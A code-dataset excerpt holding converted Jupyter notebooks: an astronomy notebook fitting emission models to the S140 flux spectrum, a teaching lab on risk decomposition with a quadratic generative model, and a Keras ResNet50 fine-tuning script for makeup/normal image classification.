path
stringlengths 8
204
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 2
values | repo_name
stringlengths 8
100
| repo_url
stringlengths 27
119
| star_events_count
int64 0
6.26k
| fork_events_count
int64 0
3.52k
| gha_license_id
stringclasses 10
values | gha_event_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_language
stringclasses 12
values | language
stringclasses 1
value | is_generated
bool 1
class | is_vendor
bool 1
class | conversion_extension
stringclasses 6
values | size
int64 172
10.2M
| script
stringlengths 367
7.46M
| script_size
int64 367
7.46M
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
/GBT/2017-09-19 fitting s140.ipynb
|
b914387e41536e0d3da52d35cdc2f440841ab37b
|
[] |
no_license
|
mabitbol/public_notebooks
|
https://github.com/mabitbol/public_notebooks
| 0 | 3 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 88,731 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# %pylab inline
# cd /home/mabitbol/GBT-S140/analysis/
import foregrounds as fg
from scipy.optimize import curve_fit
import emcee
import corner
# +
from __future__ import unicode_literals
figsize(10,8)
matplotlib.rcParams['text.usetex'] = True
matplotlib.rcParams['text.latex.unicode'] = True
rcParams['xtick.labelsize'] = 20
rcParams['xtick.major.size'] = 10
rcParams['xtick.major.width'] = 1
rcParams['xtick.major.pad'] = 10
rcParams['xtick.minor.size'] = 5
rcParams['xtick.minor.width'] = 1
rcParams['ytick.labelsize'] = 20
rcParams['ytick.major.size'] = 10
rcParams['ytick.major.width'] = 1
rcParams['ytick.major.pad'] = 10
rcParams['ytick.minor.size'] = 5
rcParams['ytick.minor.width'] = 1
rcParams['legend.fontsize'] = 24
rcParams['legend.borderaxespad'] = 1
rcParams['axes.labelsize'] = 24
rcParams['axes.titlesize'] = 24
# -
# Observation frequencies in Hz (408 MHz through 857 GHz)
freqs = np.array([408e6, 4.575e9, 5.625e9, 6.125e9, 28.5e9, 44.1e9, 70.3e9, 143e9, 217e9, 353e9, 545e9, 857e9])
# Measured S140 flux densities (Jy) at each frequency above
s140flux = np.array([5.419, 2.132, 2.045, 1.947, 3.138, 3.015, 4.127, 24.915, 126.023, 572.549, 2049.176, 7049.524])
# Assume a flat 20% flux uncertainty at every frequency
serrs = 0.2 * s140flux
errorbar(freqs, s140flux, serrs, fmt='.')
yscale('log')
xscale('log')
grid()
# Beam solid angles in steradians: pi * r^2 with r converted from degrees to radians.
# beam uses a 0.2 deg radius; beam2 a 0.16 arcmin radius compact source.
beam = pi*(0.2*pi/180.)**2
beam2 = pi*((0.16/60.)*pi/180.)**2
def signal(freqs, EM, Asd, nup, Ad, Bd, Acmb, As):
    """Spinning-dust model flux: free-free + thermal dust + AME + CMB +
    synchrotron, scaled by the beam solid angle."""
    free_free = fg.freefreep(freqs, EM=EM, Te=8000.)
    dust = fg.thermal_dust(freqs, Ad=Ad, Bd=Bd, Td=18.96)
    ame = fg.ame(freqs, Asd=Asd, nup=nup)
    cmb_term = fg.cmb(freqs, A=Acmb)
    sync = fg.synchrotron(freqs, As=As)
    return beam * (free_free + dust + ame + cmb_term + sync)
def signal2(freqs, EM1, EM2, Ad, Bd, abeam, Acmb, As):
    """UCHII-region model: two free-free components (main beam plus a compact
    source of solid angle `abeam`), thermal dust, CMB and synchrotron.
    Each term is taken in absolute value so no component subtracts flux."""
    terms = [
        fg.freefreep(freqs, EM=EM1, Te=8000.) * beam,
        fg.freefreep(freqs, EM=EM2, Te=8000.) * abeam,
        fg.thermal_dust(freqs, Ad=Ad, Bd=Bd, Td=18.96) * beam,
        fg.cmb(freqs, A=Acmb) * beam,
        fg.synchrotron(freqs, As=As) * beam,
    ]
    return sum(np.abs(term) for term in terms)
def signal3(freqs, EM, Ad, Bd, Acmb, As):
    """Baseline model (no AME): free-free + thermal dust + CMB + synchrotron,
    scaled by the beam solid angle."""
    free_free = fg.freefreep(freqs, EM=EM, Te=8000.)
    dust = fg.thermal_dust(freqs, Ad=Ad, Bd=Bd, Td=18.96)
    cmb_term = fg.cmb(freqs, A=Acmb)
    sync = fg.synchrotron(freqs, As=As)
    return beam * (free_free + dust + cmb_term + sync)
# Initial guesses and bounds for the spinning-dust model: (EM, Asd, nup, Ad, Bd, Acmb, As)
pn = np.array([5e3, 1.e-3, 20.e9, 1., 2., 30.e-6, 1e3])
bounds = ( [0, 0, 0, 0, 0, -1., 0], [1e4, 1., 1e11, 1., 3., 1., 1e6])
x = curve_fit(signal, freqs, s140flux, p0=pn, sigma=serrs, absolute_sigma=True, bounds=bounds)
pfit = x[0]
# UCHII model: (EM1, EM2, Ad, Bd, abeam, Acmb, As); abeam starts at the compact-source beam
pn2 = np.array([5e3 , 1.e7, 0.1, 2., beam2, 30e-6, 1e3])
bounds2 = ( [0, 1.e5, 0, 0, 0, -1., 0], [1e4, 1.e9, 1., 3., 1., 1., 1e6])
x = curve_fit(signal2, freqs, s140flux, p0=pn2, sigma=serrs, absolute_sigma=True, bounds=bounds2)
pfit2 = x[0]
# Baseline model without AME: (EM, Ad, Bd, Acmb, As)
pn3 = np.array([5e3, 1., 2., 30.e-6, 1e3])
bounds3 = ( [0, 0, 0, -1., 0], [1e4, 1., 3., 1., 1e6])
x = curve_fit(signal3, freqs, s140flux, p0=pn3, sigma=serrs, absolute_sigma=True, bounds=bounds3)
pfit3 = x[0]
# Reduced chi-squared for each fit: chi^2 / (N - number of fitted parameters)
rchisq1 = np.sum( ( s140flux - signal(freqs, *pfit))**2 / serrs**2 ) / (len(freqs) - 7.)
rchisq2 = np.sum( ( s140flux - signal2(freqs, *pfit2))**2 / serrs**2 ) / (len(freqs) - 7.)
rchisq3 = np.sum( ( s140flux - signal3(freqs, *pfit3))**2 / serrs**2 ) / (len(freqs) - 5.)
# Python 2 print statements (the notebook kernel is python2)
print rchisq1, rchisq2, rchisq3
print "EM, Asd, nup, Ad, Bd, Acmb, As"
print pfit
print "EM1, EM2, Ad, Bd, abeam, Acmb, As"
print pfit2
print "EM, Ad, Bd, Acmb, As"
print pfit3
nu = np.linspace(freqs[0], freqs[-1], 1000)
# +
figure(figsize=(16,10))
plot(nu*1e-9, signal(nu, *pfit), label='$\mathrm{Spinning\ Dust}$')
plot(nu*1e-9, signal2(nu, *pfit2), label='$\mathrm{UCHII\ Region}$')
plot(nu*1e-9, signal3(nu, *pfit3), label='$\mathrm{Baseline}$')
errorbar(freqs*1e-9, s140flux, yerr=serrs, fmt='ko',label='$\mathrm{CGPS,\ GBT,\ and\ Planck\ data}$')
xscale('log')
yscale('log')
xlabel('$\mathrm{Frequency}\ (GHz)$')
ylabel('$\mathrm{Flux}\ (Jy)$')
legend(loc=2, ncol=1)
grid()
#ylim(1e-1, 1e5)
grid(which='minor')
title('$\mathrm{S140\ Flux\ Spectrum}$')
#savefig('../notebooks/fullspectrum_withspinningdust')
# -
| 4,343 |
/demos/demo04.ipynb
|
cc2ff65ed1d7dea29e22d58c4a8738e6ce1025c8
|
[] |
no_license
|
RubyLiu206/DS-GA-3001.007-Public
|
https://github.com/RubyLiu206/DS-GA-3001.007-Public
| 0 | 0 | null | 2019-12-04T15:27:59 | 2019-12-01T23:54:28 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 561,174 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Risk Decomposition
import numpy as np
import matplotlib.pyplot as plt
from functools import partial
from sklearn import linear_model
from scipy.stats import norm
import matplotlib.mlab as mlab
# %matplotlib inline
# #### Generic Utility Functions
def plot_prediction_function(f_list = None, label_list = None, data = None, alpha = 0.9, include_data_x = False):
    """Plot prediction functions and/or a scatter of data points on one figure.

    f_list:         list of callables mapping an x array to a y array
    label_list:     legend labels, one per function in f_list
    data:           optional (n, 2) array; column 0 is x, column 1 is y
    alpha:          scatter transparency
    include_data_x: also evaluate each f at (and just around) every data x,
                    so point-wise features (e.g. a memorizing predictor) render
    """
    plt.figure(figsize=(20,10))
    # x range: span of the data if given, otherwise [-5, 5]
    if data is not None:
        x_min, x_max = np.min(data[:, 0]), np.max(data[:, 0])
    else:
        x_min, x_max = -5.0, 5.0;
    if ( (f_list is not None) and (label_list is not None) ):
        x_array = np.arange(x_min, x_max, 0.1);
        if include_data_x:
            # add each data x plus small offsets on either side so sharp
            # spikes at the data points are visible in the line plot
            x_array = np.concatenate([x_array, data[:, 0], data[:, 0]+0.001, data[:, 0]-0.001])
            x_array = np.sort(x_array)
        for f, label in zip(f_list, label_list):
            f_y = f(x_array);
            plt.plot(x_array, f_y, label=label);
    if data is not None:
        plt.scatter(data[:, 0], data[:, 1], alpha = alpha )
    if label_list is not None:
        plt.legend()
    plt.show()
# ## Generative Model for Data
# We will work on a regression problem in this lab. The input, action and output space will be $\mathcal{R}$. The output $y$ is related to the input $x$ as $ y = g(x) = ax^2 + bx + c $ where $a,b$ and $c$ are sampled from random variables which follows gaussian distribution with parameters $\mu_a, \sigma_a$, $\mu_b, \sigma_b$ and $\mu_c, \sigma_c$ respectively. (Basically, given $x$, $y$ depends on $3$ random numbers). Assume that $X$ is sampled from $\mathcal{N}(\mu_x, \sigma_x)$. For the purposes of this lab, let's set $\mu_a = 1, \mu_b = 2, \mu_c = 3, \mu_x = 0$ and $\sigma_a = \sigma_b = \sigma_c = \sigma_x = 1$.
# #### Utility functions for sampling
# +
mu_a = 1;
sigma_a = 1;
mu_b = 2;
sigma_b = 1;
mu_c = 3;
sigma_c = 1;
mu_x = 0;
sigma_x = 1;
assert( (mu_x == 0) and (sigma_x == 1))
# +
## assumes g is a polynomial. Takes in a coeff list, where coeff_list[i] is the coefficient of x^i and x to evaluate it at
def template_g(coeff_list, x):
    """Evaluate the polynomial sum_i coeff_list[i] * x**i at x (scalar or array)."""
    return sum(coeff * x**power for power, coeff in enumerate(coeff_list))
# +
### generates one sample function g
def sample_g():
    """Draw one random quadratic g(x) = a*x^2 + b*x + c with gaussian a, b, c.

    The three coefficients are drawn in the order a, b, c (matching the
    original RNG consumption order) and packed lowest-degree first for
    template_g.
    """
    quad = np.random.randn() * sigma_a + mu_a
    lin = np.random.randn() * sigma_b + mu_b
    const = np.random.randn() * sigma_c + mu_c
    return partial(template_g, [const, lin, quad])
# +
## give one (x,y) sample
def get_one_x_y_sample():
    """Sample x ~ N(mu_x, sigma_x), then return (x, g(x)) for a fresh random g."""
    x_sample = np.random.randn() * sigma_x + mu_x
    random_g = sample_g()
    return x_sample, random_g(x_sample)
# +
## gives a matrix with first column x and second column y
def generate_n_samples(n = 1000):
    """Return an (n, 2) array of iid draws; column 0 holds x, column 1 holds y."""
    samples = np.zeros([n, 2])
    for row in range(n):
        samples[row] = get_one_x_y_sample()
    return samples
# -
# ### Visualizing samples from $\mathcal{P}_{X \times Y}$
data_cloud = generate_n_samples(1000)
plot_prediction_function(data = data_cloud)
# ### Visualizing samples of $Y$ for fixed values of $X$
def y_for_fixed_x( x_list = np.arange(-4, 4.5, 0.5), n_sample_per_x = 10):
    """For each x in x_list, draw n_sample_per_x fresh g's and record (x, g(x)).

    Returns an (len(x_list) * n_sample_per_x, 2) array with x in column 0
    and the sampled y in column 1.
    """
    out = np.zeros([len(x_list) * n_sample_per_x, 2])
    row = 0
    for x in x_list:
        for _ in range(n_sample_per_x):
            g = sample_g()
            out[row, 0] = x
            out[row, 1] = g(x)
            row += 1
    return out
plot_prediction_function(data = y_for_fixed_x(n_sample_per_x=50) )
# ## Exercise:
#
# Recall that the risk of a function $f$ wrt to loss $l$, $R(f) = E[l((f(x), y)]$ and the bayes optimal function $f^* = \underset{f}{\operatorname{argmin}}R(f)$
#
# (Hint: for $X \sim \mathcal{N}(0, 1)$, $E[X^4] = 3$)
#
# 1. If we minimize l2 loss, what is the bayes optimal function $f^*(x)$ for the model described above? Does your answer depend on the distribution assumed on $X$?
# 2. What is the risk associated with $f^*(x)$, $R(f)$?
# 3. Once you have mathematical expressions for 1 and 2, fill in the python functions below for the bayes prediction function and bayes risk.
# ## Answers:
# Remember that $R(f) = E[(f(x) - E[y|x])^2 ] + E[(y - E[y|x])^2] $
# 1. For l2 loss, $f^*(x) = E[Y|X=x] = \mu_a x^2 + \mu_b x + \mu_c $. No, independent of distribution on $X$.
# 2. From the decomposition of l2 loss above,
# $$ \begin{align}
# R(f^*(x)) &= E[(y - E[y|x])^2] \\
# &= E_x[ E_{y|x} [ (y - E[y|x])^2 ] ] \\
# &= E_x[ \sigma_a^2 x^4 + \sigma_b^2 x^2 + \sigma_c^2 ] \\
# &= \sigma_a^2 (3) + \sigma_b^2 ( \sigma_x^2 + \mu_x^2) + \sigma_c^2
# \end{align} $$
#
#
## variable f_star assiged to bayes optimal function
## bayes risk with numerical value of bayes risk
f_star = partial(template_g, [mu_c, mu_b, mu_a] )
bayes_risk = sigma_a**2 * 3 + sigma_b**2 * ( sigma_x**2 + mu_x**2) + sigma_c**2;
print(bayes_risk)
plot_prediction_function([f_star], ['$f^*$'], data=data_cloud)
plot_prediction_function([f_star], ['$f^*$'], data=y_for_fixed_x(n_sample_per_x=100) )
# ## Estimating the Risk $R(f)$ using monte-carlo
# +
## For Students to Fill in
## use get_one_x_y_sample()
def estimate_risk(f, n_try = int(1e5) ):
    """Monte-carlo estimate of the L2 risk R(f) = E[(f(x) - y)^2].

    Draws n_try iid (x, y) samples from the generative model and averages
    the squared prediction error.
    """
    # renamed accumulator from `sum`, which shadowed the builtin of the same name
    total = 0.0
    for _ in range(n_try):
        x, y = get_one_x_y_sample()
        total += (f(x) - y)**2
    return total / n_try
# -
estimate_risk(f_star)
# # Empirical Risk
# We never usually know $\mathcal{P}_{X, Y}$ and we work with finite samples drawn from the distribution. With $\mathcal{D}_n = ( (x_1, y_1), (x_2, y_2), \dots , (x_n, y_n) )$ be $n$ iid data points, the empirical risk of $f$ with respect to loss $l$ on dataset $\mathcal{D}_n$ is defined as $$ \hat{R}_n(f) = \frac{1}{n} \sum_{i=1}^{n} l( f(x_i), y_i) $$
#
# Have we used the expression of $ \hat{R}_n(f) $ for anything till now?
# Answer:
# We estimated risk in monte carlo simulation using the same expression.
# ### Exercise:
#
# 1. Is $\hat{R}_n(f)$ or $R(f)$ a random variable? If so, what is the mean of the random variable and what is it's distribution?
# 2. Can $R(f) \geq \hat{R}_n(f)$?
#
#
# Answers:
#
# 1. $\hat{R}_n(f)$ is random variable with the mean $R(f)$. Approximately gaussian using CLT.
# 2. Yes
def empirical_risk(f, sample_matrix):
    """Empirical L2 risk of f on a dataset (column 0 = x, column 1 = y):
    the mean squared error over all rows."""
    predictions = f(sample_matrix[:, 0])
    residuals = predictions - sample_matrix[:, 1]
    return np.mean(residuals ** 2)
# #### Checking the distribution of $\hat{R}_n(f)$
# +
n = 1000;
emp_rsk = np.zeros(n)
for i in range(n):
emp_rsk[i] = empirical_risk(f_star, generate_n_samples(5000))
print( np.mean(emp_rsk) )
# +
datos = emp_rsk
plt.figure(figsize=(20,10))
# best fit of data
(mu, sigma) = norm.fit(datos)
# the histogram of the data
n, bins, patches = plt.hist(datos, 75, density=True, facecolor='green', alpha=0.75)
# add a 'best fit' line.
# FIX: matplotlib.mlab.normpdf was removed in matplotlib 3.1;
# use scipy.stats.norm.pdf instead (norm is already imported above).
y = norm.pdf(bins, mu, sigma)
l = plt.plot(bins, y, 'r--', linewidth=2)
#plot
plt.xlabel('Smarts')
plt.ylabel('Probability')
plt.title(r'$\mathrm{Histogram\ of\ \hat{R}(f^*):}\ \mu=%.3f,\ \sigma=%.3f$' %(mu, sigma))
plt.grid(True)
plt.show()
# -
# ## Empirical Risk Minimization
# Let's fix a training data with $n = 100$ points
data = generate_n_samples(n = 100);
# ### Visualizing Data
plot_prediction_function([f_star], ['$f^*$'], data)
# ### Exercise
# One way to achieve $\hat{R}_n(f) = 0 $ is to memorize the data. For the sake of simplicity let's assume that the $\mathcal{D}_n$ we are working with has no duplicate values for $x$. The function $f(x)$ returns the corresponding $y$ from $\mathcal{D}_n$ otherwise $f(x)$ returns $0$. What is the risk, $R(f)$, for this function?
# Answer:
#
# $$ \begin{align}
# R(f) &= E[ (Y - 0) ^2 ] \\
# &= E_{X} E_{Y|X=x} E[ Y^2 ] \\
# &= E_{X} ( var(Y|X=x) + E[Y|X=x]^2 ) \\
# &= E_{X} ( \sigma_a^2 X^4 + \sigma_b^2 X^2 + \sigma_c^2 + (\mu_a X^2 + \mu_b X + \mu_c )^2 ) \\
# &= E_{X} ( (\sigma_a^2 + \mu_a^2) X^4 + (\alpha)X^3 + (\sigma_b^2 + \mu_b^2 + 2 \mu_c \mu_a ) X^2 + \beta X + \sigma_c^2 + \mu_c^2 \\
# &= 3(\sigma_a^2 + \mu_a^2) + (\sigma_b^2 + \mu_b^2 + 2 \mu_c \mu_a ) + \sigma_c^2 + \mu_c^2
# \end{align} $$
risk_memorized_function = 3*(sigma_a**2 + mu_a**2) + (sigma_b**2 + mu_b**2 + 2*mu_c*mu_a) + sigma_c**2 + mu_c**2
print(risk_memorized_function)
# ### Estimating the risk of memorized function numerically
def f_memorized(x_array):
    """Memorizing predictor: return the stored y for any x found in the module-level
    `data`, and 0.0 for any unseen x.

    Accepts a scalar or a list/array of x values and returns the matching shape.
    """
    scalar = False
    if not isinstance(x_array, (list, np.ndarray)):
        scalar = True
        x_array = np.array([x_array])
    result = np.zeros_like(x_array).astype(float)
    # Build the exact-match table once instead of rescanning `data` for every
    # query (the original inner loop was O(len(data)) per element and kept
    # scanning even after a match). With duplicate x's the last y wins,
    # matching the original no-break behavior.
    lookup = {x_i: y_i for x_i, y_i in data}
    for i, x in enumerate(x_array):
        result[i] = lookup.get(x, 0.0)
    if scalar:
        return result[0]
    return result
linear_f_hat_risk = estimate_risk( f_memorized, n_try=int(1e3) )
print('Risk: ', linear_f_hat_risk)
linear_f_hat_empirical_risk = empirical_risk(f_memorized, data)
print('Empirical Risk: ', linear_f_hat_empirical_risk)
plot_prediction_function([f_star, f_memorized], ['$f^*$', 'memorized'], data, include_data_x=True)
# ### Constrained Risk Minimization
# Like we saw in the previous section, (unconstrained) empirical risk minimization is (almost) useless in practice. We achieved a perfect $0$ for empirical risk but we have an increase in the actual risk, which is the quantity we care about.
# #### Linear (Affine) Hypothesis Space
# ## Exercise
# For $f(x) = \alpha x + \beta$
# 1. Calculate an expression for risk of $f(x)$
# 2. Find $\alpha^*, \beta^*$ which minimises $R(f)$.
# Answer:
# 1.
#
# $$ \begin{align}
# R(f) &= E[ (Y - \alpha X - \beta )^2 ] \\
# &= E_{X} E_{Y|X=x} E[ (Y - \alpha x - \beta )^2 ] \\
# &= E_{X} ( var( (Y - \alpha x - \beta )|X=x) + E[(Y - \alpha x - \beta )|X=x]^2 ) \\
# &= E_{X} ( \sigma_a^2 X^4 + \sigma_b^2 X^2 + \sigma_c^2 + (\mu_a X^2 + (\mu_b - \alpha) X + (\mu_c - \beta) )^2 ) \\
# &= E_{X} ( (\sigma_a^2 + \mu_a^2) X^4 + (something)X^3 + (\sigma_b^2 + (\mu_b - \alpha)^2 + 2 (\mu_c - \beta) \mu_a ) X^2 + (something) X + \sigma_c^2 + (\mu_c - \beta)^2 \\
# &= 3(\sigma_a^2 + \mu_a^2) + (\sigma_b^2 + (\mu_b - \alpha)^2 + 2 (\mu_c - \beta) \mu_a ) + \sigma_c^2 + (\mu_c - \beta)^2
# \end{align} $$
# 2.
#
# To find $\alpha^*, \beta^*$
# $$ \frac{d}{d \alpha}R(f) = 2(\alpha - \mu_b) = 0 $$
# Therefore, $\alpha^* = \mu_b$
# $$ \frac{d}{d \beta}R(f) = -2 \mu_a + 2(\beta - \mu_c) = 0 $$
# $\beta^* = \mu_a + \mu_c$
#
# +
### risk for linear function (alphax + beta)
## students fill in
def linear_function_risk(alpha, beta):
    """Closed-form risk R(f) of the affine predictor f(x) = alpha*x + beta,
    following the derivation in the markdown cell above this function."""
    quartic_term = 3 * (sigma_a**2 + mu_a**2)
    quadratic_term = sigma_b**2 + (mu_b - alpha)**2 + 2 * (mu_c - beta) * mu_a
    constant_term = sigma_c**2 + (mu_c - beta)**2
    return quartic_term + quadratic_term + constant_term
# +
### Estimating Risk
linear_f_star = partial(template_g, [mu_a + mu_c, mu_b]);
mc_linear_f_star_risk = estimate_risk( linear_f_star)
print('MC Risk: ', mc_linear_f_star_risk)
linear_f_star_risk = linear_function_risk(mu_b, mu_a + mu_c)
print('Risk :' , linear_f_star_risk)
# -
# ### Visualizing Prediction Function $\ \ f^*_\mathcal{H}$
plot_prediction_function([linear_f_star, f_star], ['$f^*_\mathcal{H}$', '$f^*$'], data, alpha = 1)
# ### Constrained Empirical Risk Minimization
# #### $\hat{\alpha}, \hat{\beta}$ which minimises $\hat{R}(f)$ and estimate the risk using monte carlo method.
## Fitting Linear Regression on Data
reg = linear_model.LinearRegression(fit_intercept=True).fit(data[:, 0:1], data[:, 1])
reg.intercept_, reg.coef_
linear_f_hat = partial(template_g, [reg.intercept_, reg.coef_[0]])
linear_f_hat_risk = linear_function_risk(reg.coef_[0], reg.intercept_)
print('Risk :' , linear_f_hat_risk)
mc_linear_f_hat_risk = estimate_risk( linear_f_hat )
print('MC Risk: ', mc_linear_f_hat_risk)
linear_f_hat_empirical_risk = empirical_risk(linear_f_hat, data)
print('Empirical Risk: ', linear_f_hat_empirical_risk)
# ### Visualizing Prediction Function $\ \ \hat{f}_\mathcal{H}$
plot_prediction_function([linear_f_star, linear_f_hat, f_star], ['$f^*_\mathcal{H}$', '$\hat{f}_\mathcal{H}$', '$f^*$'], data, alpha = 1)
# ## Error Decomposition
# Recall that: <br>
# Approximation Error for $\mathcal{H}$ = $R(f^*_{\mathcal{H}}) - R(f^*) $ <br>
# Estimation Error of $\ \hat{f}_\mathcal{H}$ = $R(\hat{f}_{\mathcal{H}}) - R(f_{\mathcal{H}})$ <br>
# Excess Risk of f = $R(f) - R(f^*)$
# ### Exercise:
# 1. From the values we calculated above, what is the approximation error for linear hypothesis space? Is approximation error a random variable?
# 2. What is the estimation error of $\ \hat{f}_\mathcal{H}$? Is estimation error a random variable?
# 3. What is the excess risk of $\ \hat{f}_\mathcal{H}$? Is this a random variable?
# #### Answers:
#
# 1. Approximation Error is not random.
# 2. Estimation Error is random.
# 3. Excess risk of $\ \hat{f}_\mathcal{H}$ is random.
# ### Estimation Error and Excess risk of $\hat{f}_\mathcal{H}$
def estimation_error_and_excess_risk(data, risk_fh, risk_f_star):
    """Fit OLS on `data` and return (estimation error, excess risk).

    risk_fh:     risk of the best-in-class function f*_H
    risk_f_star: bayes risk R(f*)
    """
    fitted = linear_model.LinearRegression(fit_intercept=True).fit(data[:, 0:1], data[:, 1])
    fitted_risk = linear_function_risk(fitted.coef_[0], fitted.intercept_)
    return fitted_risk - risk_fh, fitted_risk - risk_f_star
n_try = 1000;
estimation_error_array = np.zeros(n_try);
excess_risk_array = np.zeros(n_try)
for i in range(n_try):
estimation_error_array[i], excess_risk_array[i] = estimation_error_and_excess_risk( generate_n_samples(n = 100), linear_f_star_risk, bayes_risk)
_ = plt.hist(estimation_error_array, bins = 100)
_ = plt.hist(excess_risk_array, bins = 100)
# ### Optimization Error
# Since we were optimizing for L2 loss over a linear hypothesis space, we found the best possible $\hat{f}_\mathcal{H}$ (upto numerical error) using the closed form expression for linear regression. What if we use SGD instead to find $f$ and stop iterations prematurely?
reg_sgd = linear_model.SGDRegressor(max_iter=3,
fit_intercept = True,
penalty = 'none', #No Regularization
tol = None)
reg_sgd.fit(data[:, 0:1], data[:, 1])
reg_sgd.intercept_, reg_sgd.coef_
linear_f_tilde = partial(template_g, [reg_sgd.intercept_[0], reg_sgd.coef_[0]])
linear_f_tilde_risk = linear_function_risk(reg_sgd.coef_[0], reg_sgd.intercept_[0])
print('Risk :' , linear_f_tilde_risk)
mc_linear_f_tilde_risk = estimate_risk( linear_f_tilde )
print('MC Risk: ', linear_f_tilde_risk)
linear_f_tilde_empirical_risk = empirical_risk(linear_f_tilde, data)
print('Empirical Risk: ', linear_f_tilde_empirical_risk)
# ### Visualizing $\ \ \ \tilde{f_\mathcal{H} }$
plot_prediction_function([linear_f_star, linear_f_hat, linear_f_tilde, f_star],
['$f^*_\mathcal{H}$', '$\hat{f}_\mathcal{H}$', '$\tilde{f_\mathcal{H}}$', '$f^*$'],
data, alpha = 1)
# ### Exercise:
# What is the optimization error? How do you expect it to change with the number of iterations of gradient descent?
# Answer: As the number of iterations increases, the optimization error will decrease.
# # Additional Questions
# 1. Suppose we use another hypothesis space $\mathcal{H}' \subset \mathcal{H}$, how do you expect the approximation error to change?
# 2. Suppose we increase the number of data points $n$ in the sample to calculate $\ \hat{f}_\mathcal{H}$. How do we expect estimation error to change?
# 2. Repeat everything we did for linear hypothesis space for constant, quadratic and cubic hypothesis space for $n=500, 1000$ as well - does your results match with what you expected in 1 and 2?
| 15,998 |
/ResNet50.ipynb
|
5a439ae124bf9338b54afb4d7b033e0c69cd8feb
|
[] |
no_license
|
hoangnguyenkcv/Keras_CNN_models
|
https://github.com/hoangnguyenkcv/Keras_CNN_models
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 733,603 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
# +
import keras
from keras.models import Sequential
from keras.models import Model
from keras import backend as K
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.optimizers import SGD, RMSprop, Adam
from keras.metrics import categorical_crossentropy
from keras.preprocessing.image import ImageDataGenerator
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import *
from keras import regularizers ### for SVM
import numpy as np
import tensorflow as tf
# import theano
import matplotlib.pyplot as plt
import matplotlib
import itertools
from numpy import*
from sklearn.utils import shuffle
# %matplotlib inline
import random as rn
import os
os.environ['PYTHONASHSEED']= '0'
from keras.models import load_model
tf.reset_default_graph()
# -
from keras.applications.resnet50 import ResNet50
from keras.preprocessing import image
from keras.applications.resnet50 import preprocess_input, decode_predictions
# setting the seed for numpy-generated random numbers
np.random.seed(7)
# setting the seed for python random numbers
rn.seed(124)
# setting the seed for tensorflow random numbers
tf.set_random_seed(57)
# +
train_path = '.\MAKEUP\Train'
valid_path = '.\MAKEUP\Valid'
#test_path = '.\CASIA1\Test'
# -
train_batches = ImageDataGenerator().flow_from_directory(train_path, target_size = (224,224), classes = ['MakeUp','Normal'], batch_size =8)
valid_batches = ImageDataGenerator().flow_from_directory(valid_path, target_size = (224,224), classes = ['MakeUp','Normal'], batch_size = 8)
# test_batches = ImageDataGenerator().flow_from_directory(test_path, target_size = (224,224), classes = ['Au','Sp'], batch_size =8)
# +
# plots images with labels within jupyter notebook
def plots(ims, figsize = (12,6), rows=1, interp =False , titles = None):
    """Display a batch of images in a grid inside the notebook, optionally
    with one title per image."""
    if type(ims[0]) is np.ndarray:
        ims = np.array(ims).astype(np.uint8)
        # channels-first batches are transposed to channels-last for imshow
        if (ims.shape[-1] !=3):
            ims = ims.transpose((0,2,3,1))
    fig = plt.figure(figsize=figsize)
    cols = len(ims) // rows if len(ims) % 2 == 0 else len(ims) // rows + 1
    for idx, img in enumerate(ims):
        axis = fig.add_subplot(rows, cols, idx + 1)
        axis.axis('Off')
        if titles is not None:
            axis.set_title(titles[idx], fontsize=16)
        plt.imshow(img, interpolation=None if interp else 'none')
    plt.show()
# -
imgs, labels = next(train_batches)
plots(imgs, titles = labels)
#### Build Fine-tuned ResNet model
model = keras.applications.resnet50.ResNet50()
print('Model loaded.')
model.summary()
model.layers.pop()
last = model.layers[-1].output
x = Dense(2, activation = 'linear', kernel_regularizer=regularizers.l2(0.001))(last)
finetuned_model = Model(model.input, x)
n = len(finetuned_model.layers)
for idx, layer in enumerate(finetuned_model.layers):
if idx < (n-1):
layer.trainable = False
else:
layer.trainable = True
# +
opt = Adam(lr=0.0001, decay=10e-6)
finetuned_model.compile(loss='hinge', optimizer=opt, metrics=['accuracy'])
# model.compile(loss='hinge', optimizer='adadelta', metrics=['accuracy'])
# sgd = SGD(lr=0.0001, decay=1e-6, momentum=0.9, nesterov=True)
# model.compile(loss='hinge', optimizer=sgd, metrics=['accuracy'])
# +
from keras.callbacks import ModelCheckpoint
# Save check point
filepath = "weights.resnet50.best.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose =1, save_best_only = True, mode ='max')
callbacks_list= [checkpoint]
# Fit the model
# model.fit(X,Y, validation_split=0.33, nb_epoch =150, batch_size =10, callbacks = callbacks_list, verbose =0)
history = finetuned_model.fit_generator(train_batches, steps_per_epoch = 120, validation_data = valid_batches, validation_steps=26, epochs =200, shuffle=True, callbacks = callbacks_list, verbose =2)
# +
# plot history
print(history.history.keys())
# summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train','valid'], loc= 'upper left' )
plt.show()
# -
# Save model
#model.save('forgecy_image_model.h5')
# model.summary()
# model.get_weights()
# model.optimizer
## Load model
#from keras.models import load_model
#model = load_model('forgecy_image_model.h5')
# +
# # estimate accuracy on whole dataset using loaded weights
# scores = model.evaluate(X, Y, verbose=0)
# print("%s: %.2f%%" % (model.metrics_names[1], scores[1]*100))
# -
test_imgs, test_labels = next(test_batches)
test_labels = test_labels[:, 0]
